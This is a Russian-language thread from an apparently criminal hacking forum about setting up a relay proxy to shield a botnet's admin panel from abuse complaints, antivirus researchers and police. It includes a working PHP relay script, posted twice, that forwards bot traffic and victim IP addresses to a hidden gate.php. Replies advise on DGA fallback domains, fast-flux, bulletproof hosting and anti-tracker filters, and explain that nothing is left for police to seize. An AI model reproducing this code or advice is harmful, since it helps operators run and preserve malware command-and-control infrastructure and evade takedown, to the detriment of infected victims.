• XSS.stack #1 – первый литературный журнал от юзеров форума

Защита зверька

Отслеживать

Sn@p

HDD-drive
Пользователь
Регистрация
19.03.2019
Сообщения
33
Реакции
5
Всем привет!
Часто вижу в топах по продажам да и не только, упоминание о прокладке.
  1. Как я понял она служит для временной зашиты админки от абузы.? А если хостер заявляет что игнорит абузы и спамхаус? Нужна ли прокладка?
  2. Для прокладки нужен абузоустойчивый хост или ...?
  3. Где взять скрипт для прокладки?
 
1.да.с 1 стороны можно игнорировать но с другой лучше использовать прокладку
2.не обязательно.
3.можно проксировать через nginx + apache mod_rpaf,или же пример скрипта прокладки от айса:
PHP: 
<?php
//URL оригинального сервера.
$url = "http://site.com/gate.php";

@error_reporting(0); @set_time_limit(0);

//Коннектимся к оригинальному серверу.
$url = @parse_url($url);
if(!isset($url['port']))$url['port'] = 80;
if(($real_server = @fsockopen($url['host'], $url['port'])) === false)die('E1');

//Получаем данные для пересылки.
if(($data = @file_get_contents('php://input')) === false)$data = '';

//Формируем запрос.
$request  = "POST {$url['path']}?ip=".urlencode($_SERVER['REMOTE_ADDR'])." HTTP/1.1\r\n";
$request .= "Host: {$url['host']}\r\n";

if(!empty($_SERVER['HTTP_USER_AGENT']))$request .= "User-Agent: {$_SERVER['HTTP_USER_AGENT']}\r\n";

//$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Content-Length: ".strlen($data)."\r\n";
$request .= "Connection: Close\r\n";

//Отправляем.
fwrite($real_server, $request."\r\n".$data);

//Получаем ответ.
$result = '';
while(!feof($real_server))$result .= fread($real_server, 1024);
fclose($real_server);

//Выводим ответ.
echo substr($result, strpos($result, "\r\n\r\n") + 4);
?>
 
Sn@p сказал(а):
Всем привет!
Часто вижу в топах по продажам да и не только, упоминание о прокладке.
  1. Как я понял она служит для временной зашиты админки от абузы.? А если хостер заявляет что игнорит абузы и спамхаус? Нужна ли прокладка.

  1. Не стоит боятся абузы,а стоит бояться детекта по коннкту к панельке (Домену, IP). На сколько я знаю, то подобные штуки очень быстро попадают в разные детекшен механизмы, есть куча открытых фидов, где все это шарится. Поэтому куда проще и быстрее поменять прокладку, а не админку. В случае, если вы хотите держать FUD, то делать это нужно очень часто.
  2. Лучше всего дешевых хостинг с API, чтобы смену прокладки можно было автоматизировать.
 
  1. Значит абузу получит прокладка? А как держится дальше связь с ботами(чтоб их не потерять), ведь они знают адрес только прокладки? или прокладок может быть несколько, в случае блока одной стучат в следующую?
  2. Могут ли аверы и всякие реверсы запалить сразу все адреса прокладок, или они видят только куда бот стучит и могут абузить только по нарастающей?
  3. В качестве прокладки нужен vps + домен, или можно использовать только vps?
 
Sn@p сказал(а):
  1. Значит абузу получит прокладка? А как держится дальше связь с ботами(чтоб их не потерять), ведь они знают адрес только прокладки? или прокладок может быть несколько, в случае блока одной стучат в следующую?
  2. Могут ли аверы и всякие реверсы запалить сразу все адреса прокладок, или они видят только куда бот стучит и могут абузить только по нарастающей?
  3. В качестве прокладки нужен vps + домен, или можно использовать только vps?
  1. В случае, чтобы предотвратить потерю ботов через прокладку, то можно зашить DGA. Т.е. в случае если прокладка не доступна, то будет сгенерирован домен на референсное число. Про DGA можешь подробнее глянуть в разных исследованиях. ((Может кто из форумных кодеров еще что подскажут))
  2. Все куда будут стучать + статика из конфигов и самого бинарника, зависит от уровня реверсеров.
  3. Нужен какой-то очень дешевый VPS, можно без домена. (просто запилить свой небольшой кастомный прокси)
 
добавлю и свои 5 копеек:
1.да.ну все зависит от софта например в айсе можно прописать скока угодно доменов,т.е схему можно за юзать такую домен + фаст флюкс или же проксирования через mod_rpaf,ну и запасные домены к примеру при блоке подключать и так же запасные не регать сразу а потом как спалиться основной и после уже
2.могут,можно через htaccess сделать защиту от трэкеров + прикрутить фильтр по странам
3.можно так и так,но лучше впска + домен + ещё фильтры и доп защита.
все в зависимости от задачи и софта,бывает и софт уже все обходит и не нужно лишних замарочек ;)
 
Нет не будет. Тор для того и нужен, что бы вам не присылали абуз. А хост ваш скрывается луковичным шифрованием. Но хостинг от этого абузоустойчивым не становится.
А ваши боты умеют работать в торе?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Ar3s сказал(а):
Не понял вашего ответа. При чем тут спамхаус в торе?
Вы путаете бычьи яйца с северным сиянием.
Я не читал ответы в теме.


Я имел в виду, что спам-хаус банит все. Например, вы подняли супер-абузоустойчивый хост, отсканировали \ 0 с него, и возникла проблема, спам-хаус отправляет сообщения о нарушениях вашему хостеру. В конце концов, речь идет о том, что подсеть хостера может быть забанена.

Бывало просто много случаев со спамхаусом.
 
hits сказал(а):
1.да.с 1 стороны можно игнорировать но с другой лучше использовать прокладку
2.не обязательно.
3.можно проксировать через nginx + apache mod_rpaf,или же пример скрипта прокладки от айса:
PHP: 
<?php
//URL оригинального сервера.
$url = "http://site.com/gate.php";

@error_reporting(0); @set_time_limit(0);

//Коннектимся к оригинальному серверу.
$url = @parse_url($url);
if(!isset($url['port']))$url['port'] = 80;
if(($real_server = @fsockopen($url['host'], $url['port'])) === false)die('E1');

//Получаем данные для пересылки.
if(($data = @file_get_contents('php://input')) === false)$data = '';

//Формируем запрос.
$request  = "POST {$url['path']}?ip=".urlencode($_SERVER['REMOTE_ADDR'])." HTTP/1.1\r\n";
$request .= "Host: {$url['host']}\r\n";

if(!empty($_SERVER['HTTP_USER_AGENT']))$request .= "User-Agent: {$_SERVER['HTTP_USER_AGENT']}\r\n";

//$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Content-Length: ".strlen($data)."\r\n";
$request .= "Connection: Close\r\n";

//Отправляем.
fwrite($real_server, $request."\r\n".$data);

//Получаем ответ.
$result = '';
while(!feof($real_server))$result .= fread($real_server, 1024);
fclose($real_server);

//Выводим ответ.
echo substr($result, strpos($result, "\r\n\r\n") + 4);
?>
Как применить?Что за данные для пересылки?Бесконечная загрузка страница со скриптом.
И чем это лучше простого редиректа через HTML или PHP?
 
Последнее редактирование:
Тем что авер или даже ваш бот не будет знать реального домена с админкой ибо общение с ней прокладка берет на себя. А если прокладку накроют мусора - то там ничего не хранится (боты/логи). В хедшем случае мусора узнают где был ваш реальный домен с админкой. А это все время, силы, юрисдикции разных стран.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх